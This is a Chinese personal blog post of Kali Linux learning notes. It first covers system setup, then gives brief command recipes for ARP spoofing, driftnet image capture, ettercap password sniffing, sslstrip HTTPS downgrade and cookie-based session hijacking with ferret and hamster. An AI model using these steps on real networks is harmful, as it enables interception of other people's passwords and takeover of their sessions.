<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="kali," />










<meta name="description" content="本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1">
<meta name="keywords" content="kali">
<meta property="og:type" content="article">
<meta property="og:title" content="kali的学习">
<meta property="og:url" content="http://yoursite.com/2018/03/05/kali/index.html">
<meta property="og:site_name" content="JERRY HOME">
<meta property="og:description" content="本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-03-06T13:57:28.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="kali的学习">
<meta name="twitter:description" content="本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/03/05/kali/"/>





  <title>kali的学习 | JERRY HOME</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">JERRY HOME</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/03/05/kali/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jerry">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="JERRY HOME">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">kali的学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-03-05T23:38:53+08:00">
                2018-03-05
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/kali学习笔记/" itemprop="url" rel="index">
                    <span itemprop="name">kali学习笔记</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/kali学习笔记/1-kali的搭建与使用/" itemprop="url" rel="index">
                    <span itemprop="name">1. kali的搭建与使用</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文讲述了在完成kali安装后其配置的基础过程。操作系统为kali 2018.1<br><a id="more"></a></p>
<h3 id="更新源"><a href="#更新源" class="headerlink" title="更新源"></a>更新源</h3><p>更新源的配置文件目录：<code>/etc/apt/sources.list</code>,更新源可以从网络上获取，以下为我使用的更新源：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#中科大</span></span><br><span class="line">deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</span><br><span class="line">deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</span><br><span class="line"></span><br><span class="line"><span class="comment">#浙大</span></span><br><span class="line">deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line">deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line"></span><br><span class="line"><span class="comment">#阿里云源</span></span><br><span class="line"></span><br><span class="line">deb http://mirrors.aliyun.com/kali sana main non-free contrib</span><br><span class="line">deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free</span><br><span class="line">deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free</span><br></pre></td></tr></table></figure></p>
<p>配置文件修改完成后，使用<code>apt-get update</code>命令更新源，使用<code>apt-get dist-upgrade</code>命令安装源。</p>
<h3 id="安装vmware-tools工具"><a href="#安装vmware-tools工具" class="headerlink" title="安装vmware tools工具"></a>安装vmware tools工具</h3><p>在虚拟机菜单中，找到vmware tools工具，载入镜像进行安装。安装时的参数为默认值，安装完成后重启即可。</p>
<h3 id="kali美化"><a href="#kali美化" class="headerlink" title="kali美化"></a>kali美化</h3><p>执行<code>apt-get install kde-full</code>，安装美化界面。安装完成后，在登录时选择该界面即可。</p>
<h3 id="开启ssh"><a href="#开启ssh" class="headerlink" title="开启ssh"></a>开启ssh</h3><p>LINUX可以仅进入终端命令界面，从而达到节约资源的目的。<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ctrl + alt + f2 进入命令行界面</span><br><span class="line">ctrl + alt + f1 进入GUI界面</span><br></pre></td></tr></table></figure></p>
<p>开启ssh需要开启ssh服务，使用以下命令及配置开启后，可直接远程连接。<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/etc/init.d/ssh start   <span class="comment">#开启ssh</span></span><br><span class="line">ps -ef |grep ssh        <span class="comment">#检查是否启动成功</span></span><br><span class="line">nano /etc/ssh/sshd_config   将PermitRootLogin改为yes</span><br></pre></td></tr></table></figure></p>
<hr>

<h3 id="ARP欺骗"><a href="#ARP欺骗" class="headerlink" title="ARP欺骗"></a>ARP欺骗</h3><p><a href="https://segmentfault.com/a/1190000009562333" target="_blank" rel="noopener">ARP欺骗原理</a><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fping -asg 192.168.1.0/24      <span class="comment">#查询在线IP</span></span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/net/ipv4/ip_forward          <span class="comment">#打开IP转发</span></span><br><span class="line">arpspoof -i &lt;网卡名&gt; -t &lt;欺骗目标IP&gt;  &lt;我是谁&gt;     <span class="comment">#仅执行该命令则为arp断网攻击</span></span><br></pre></td></tr></table></figure></p>
<h3 id="图片捕获"><a href="#图片捕获" class="headerlink" title="图片捕获"></a>图片捕获</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">（1）开启ARP欺骗</span><br><span class="line">（2）driftnet -d 存放目录 -i 网卡名称</span><br></pre></td></tr></table></figure>
<h3 id="ettercap实现获取http密码"><a href="#ettercap实现获取http密码" class="headerlink" title="ettercap实现获取http密码"></a>ettercap实现获取http密码</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">（1）开启ARP欺骗</span><br><span class="line">（2）ettercap -Tq -i eth0  <span class="comment">#T表示文本模式，q表示静默模式</span></span><br></pre></td></tr></table></figure>
<h3 id="ettercap实现获取https密码"><a href="#ettercap实现获取https密码" class="headerlink" title="ettercap实现获取https密码"></a>ettercap实现获取https密码</h3><p>执行<code>nano /etc/ettercap/etter.conf</code>命令，修改配置文件<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">在Linux下，将两个注释放开：</span><br><span class="line"><span class="comment"># if you use iptables:</span></span><br><span class="line">   redir_command_on = <span class="string">"iptables -t nat -A PREROUTING -i %iface -p tcp --dport ...</span></span><br><span class="line"><span class="string">   redir_command_off = "</span>iptables -t nat -D PREROUTING -i %iface -p tcp --dport...</span><br></pre></td></tr></table></figure></p>
<p>使用sslstrip工具将https的链接还原为http, <a href="http://blog.csdn.net/daxueba/article/details/55190432" target="_blank" rel="noopener">sslstrip的原理</a><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sslstrip -afk</span><br></pre></td></tr></table></figure></p>
<p>再执行http密码获取的方法<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">（1）开启ARP欺骗</span><br><span class="line">（2）ettercap -Tq -i eth0  <span class="comment">#T表示文本模式，q表示静默模式</span></span><br></pre></td></tr></table></figure></p>
<h3 id="会话劫持"><a href="#会话劫持" class="headerlink" title="会话劫持"></a>会话劫持</h3><h5 id="方法1"><a href="#方法1" class="headerlink" title="方法1"></a>方法1</h5><ul>
<li>(1）开启ARP欺骗</li>
<li>(2) 打开wireshark软件，对ARP欺骗的网卡进行抓包，完成后保存格式为<code>Wireshark/tcpdump/...- pcap</code></li>
<li><p>(3) 使用ferret，生成抓包后的流量信息文件</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ferret -r c.pcap</span><br></pre></td></tr></table></figure>
</li>
<li><p>(4) 使用hamster重放流量</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cp hamster.txt /root/   <span class="comment">#将第3步的流量信息文件放到/root目录下</span></span><br><span class="line">hamster <span class="comment">#启动软件</span></span><br></pre></td></tr></table></figure>
<p>  打开浏览器，在浏览器中设置代理为<code>127.0.0.1:1234</code>，网站访问<code>127.0.0.1:1234</code>,左侧为cookie，点击重放即可。</p>
<h5 id="方法2"><a href="#方法2" class="headerlink" title="方法2"></a>方法2</h5></li>
<li>(1)打开arp欺骗</li>
<li>(2)进入<code>/usr/bin</code>目录下，执行<code>ferret -i eth0</code></li>
<li>(3)进入<code>/usr/bin</code>目录下，执行<code>hamster</code></li>
<li>(4)浏览器配置<code>127.0.0.1:1234</code>代理，并访问<code>127.0.0.1:1234</code></li>
<li>(5)流量经过eth0时，浏览器中adapters中选择eth0,并提交，cookie会实时更新。</li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/kali/" rel="tag"># kali</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/02/14/install-sspanel/" rel="next" title="ss-panel安装">
                <i class="fa fa-chevron-left"></i> ss-panel安装
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Jerry</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#更新源"><span class="nav-number">1.</span> <span class="nav-text">更新源</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#安装vmware-tools工具"><span class="nav-number">2.</span> <span class="nav-text">安装vmware tools工具</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#kali美化"><span class="nav-number">3.</span> <span class="nav-text">kali美化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#开启ssh"><span class="nav-number">4.</span> <span class="nav-text">开启ssh</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ARP欺骗"><span class="nav-number">5.</span> <span class="nav-text">ARP欺骗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#图片捕获"><span class="nav-number">6.</span> <span class="nav-text">图片捕获</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ettercap实现获取http密码"><span class="nav-number">7.</span> <span class="nav-text">ettercap实现获取http密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ettercap实现获取https密码"><span class="nav-number">8.</span> <span class="nav-text">ettercap实现获取https密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#会话劫持"><span class="nav-number">9.</span> <span class="nav-text">会话劫持</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#方法1"><span class="nav-number">9.0.1.</span> <span class="nav-text">方法1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#方法2"><span class="nav-number">9.0.2.</span> <span class="nav-text">方法2</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jerry</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info"><a class="theme-link" target="_blank" href="http://www.miitbeian.gov.cn/">浙ICP备17055283号
</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</body>
</html>
